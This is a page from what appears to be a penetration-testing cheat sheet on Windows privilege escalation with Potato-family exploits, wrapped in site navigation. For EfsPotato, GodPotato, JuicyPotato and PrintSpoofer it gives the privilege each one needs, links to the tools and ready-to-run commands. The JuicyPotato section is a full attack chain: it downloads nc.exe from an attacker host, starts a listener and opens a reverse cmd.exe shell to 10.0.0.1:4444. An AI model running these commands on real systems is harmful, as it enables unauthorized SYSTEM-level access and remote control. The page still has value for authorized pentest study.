Windows PrivEsc with LocalPotato

Windows PrivEsc with Registry Keys

Windows PrivEsc with RemotePotato

Windows PrivEsc with SeBackupPrivilege

Windows PrivEsc with Unquoted Service Path

Windows Privilege Escalation

Post Exploitation

Windows Pivoting

Forensics

Reading OneDrive Logs

Windows Disk Management

Windows Forensics

Windows Memory Dump Analysis

Windows XML EventLog (EVTX)

PowerShell

PowerShell ExecutionPolicy Bypass

PowerView

WSL

WSL Pentesting

Technique

Download Files in Windows

Windows PrivEsc with LocalPotato

Last modified: 2024-03-08

EfsPotato

Required Privilege

SeImpersonatePrivilege

Payloads

https://github.com/zcgonvh/EfsPotato

EfsPotato "cmd.exe /c whoami"

GodPotato

Required Privileges

SeImpersonatePrivilege

Payloads

https://github.com/BeichenDream/GodPotato

GodPotato -cmd "cmd /c whoami"

JuicyPotato

Required Privilege

SeImpersonatePrivilege or SeAssignPrimaryToken

Payloads

Before exploiting, we need to upload nc.exe (it is available from here) to the target machine.

Invoke-WebRequest -Uri http://10.0.0.1:8000/nc.exe -OutFile c:\Temp\nc.exe

Next start a listener in local machine.

nc -lvnp 4444

Then execute JuicyPotato in target machine.

JuicyPotatoNG.exe -t * -p "c:\Temp\nc.exe" -a "10.0.0.1 4444 -e cmd.exe"

PrintSpoofer

Required Privilege

SeImpersonatePrivilege

Payloads

https://github.com/dievus/printspoofer

PrintSpoofer.exe -i -c cmd

Windows PrivEsc with LocalPotato

EfsPotato

Required Privilege

Payloads

GodPotato

Required Privileges

Payloads

JuicyPotato

Required Privilege

Payloads

PrintSpoofer

Required Privilege

Payloads

RoguePotato

Required Privilege

Payloads

RottenPotato

Required Privilege

Payloads

References

ON THIS PAGE

Active Directory

Protocol

Service

Privilege Escalation

Post Exploitation

Forensics

PowerShell

WSL

Technique

Windows PrivEsc with LocalPotato

References

ON THIS PAGE